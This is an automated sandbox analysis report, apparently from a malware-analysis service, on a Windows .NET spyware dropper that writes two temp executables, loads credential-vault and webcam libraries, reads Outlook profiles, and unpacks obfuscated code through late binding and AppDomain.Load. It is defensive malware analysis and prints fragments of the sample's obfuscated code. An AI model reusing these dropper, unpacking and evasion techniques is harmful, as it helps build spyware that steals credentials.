Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: FB_7D21.tmp.exe.0.dr, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs	Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs	Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs	Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'

Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: FB_7BD8.tmp.exe.0.dr

Binary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.I'&

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/2@2/4

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe

Code function: 0_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,

0_2_00401000

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe

File created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp

Jump to behavior

Source: DJ5PhUwOsM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DJ5PhUwOsM.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DJ5PhUwOsM.exe

ReversingLabs: Detection: 92%

Source: unknown	Process created: C:\Users\user\Desktop\DJ5PhUwOsM.exe "C:\Users\user\Desktop\DJ5PhUwOsM.exe"
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Process created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Process created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Process created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Process created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs	.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
